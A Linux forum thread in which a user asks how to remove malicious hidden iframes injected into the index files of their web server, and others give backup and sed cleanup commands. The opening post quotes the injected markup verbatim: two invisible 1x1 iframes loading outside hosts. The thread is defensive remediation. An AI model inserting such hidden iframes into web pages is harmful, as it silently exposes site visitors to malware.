LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Newbie (https://www.linuxquestions.org/questions/linux-newbie-8/)
-   -   Iframe issues (https://www.linuxquestions.org/questions/linux-newbie-8/iframe-issues-748921/)

asassin85 08-19-2009 11:56 PM
Iframe issues
 
hello everyone

i am suffing form ifame on my linux box and i wonder if there any find and replace command or bash script to replace the whole following code

Code:
<iframe src="http://nakulpi.net/?click=81B93A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://untlexy.net/?click=18361E" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
to none

thanks

GrapefruiTgirl 08-20-2009 12:00 AM
Is this an HTML file you want to edit, or do you want to block an IFrame so it doesn't appear in your browser?

Please advise, and if it's the latter, a browser issue, what browser are you using? If it's Firefox or Opera, try AdBlockPlus.
If it's a file you wish to edit, sed should be able to handle it.

Sasha

sonnik 08-20-2009 12:56 AM
Are you text browsing? You may want to look at elinks... it deals with IFRAMES a bit better than lynx if that's the situation.

asassin85 08-20-2009 04:04 AM
hello

thanks all for help , this is a malicious or virus hits all the indexes files on server sites

i want to know if there a bash script find and replace it with null or none or remove it from the indexes , because the indexes got infected with this code

for example

i have a command that can find and replace words only , but this code have a symbols like
Code:
:// - ;
the command is

Code:
find . -type f | xargs perl -pi~ -e 's/oldtext/newtext/g;'

unSpawn 08-20-2009 05:24 AM
You'll want to make a backup before starting. Either archive files in a tarball
Code:
tar -vcf /tmp/backup_`date +%Y%m%d`.tar `find /path/to/dir -type f -iname \*.htm\* -o -iname \*.php\* -o iname \*.inc`
or copy the files to a backup path
Code:
find /path/to/wwwdir -type f -iname \*.htm\* -o -iname \*.php\* -o iname \*.inc | cpio -pdlma /path/to/backupdir
then if you made your backup you can strip tags in place using sed and read back the "/tmp/sed.log" to see what changed (top of my head):
Code:
find /path/to/wwwdir -type f -iname \*.htm\* -o -iname \*.php\* -o iname \*.inc | while read FILE; do
 sed -i "s|<iframe.src"=.*"></iframe>||g" "${FILE}" 2>&1 && echo "Stripped "${FILE}""
done | tee /tmp/sed.log
or if you copied files to a backup path you could 'diff' then on the fly to check what changed:
Code:
find /path/to/wwwdir -type f -iname \*.htm\* -o -iname \*.php\* -o iname \*.inc | while read FILE; do
 sed -i "s|<iframe.src"=.*"></iframe>||g" "${FILE}" 2>&1 && echo "Stripped "${FILE}""
 diff urN /path/to/backupdir/"${FILE}" "${FILE}" 2>&1
done | tee /tmp/sed.log
and also find those changes listed in the "/tmp/sed.log". As always YMMV(VM).

Also note this only addresses the symptoms and not the cause of the infection, as in an infected mcrsft editing host or running vulnerable PHP-based software or host compromise. Leaving it at changing files will seem carefree and easy but you'll find the "infection" will also spread again and as easy.


All times are GMT -5. The time now is 11:22 PM.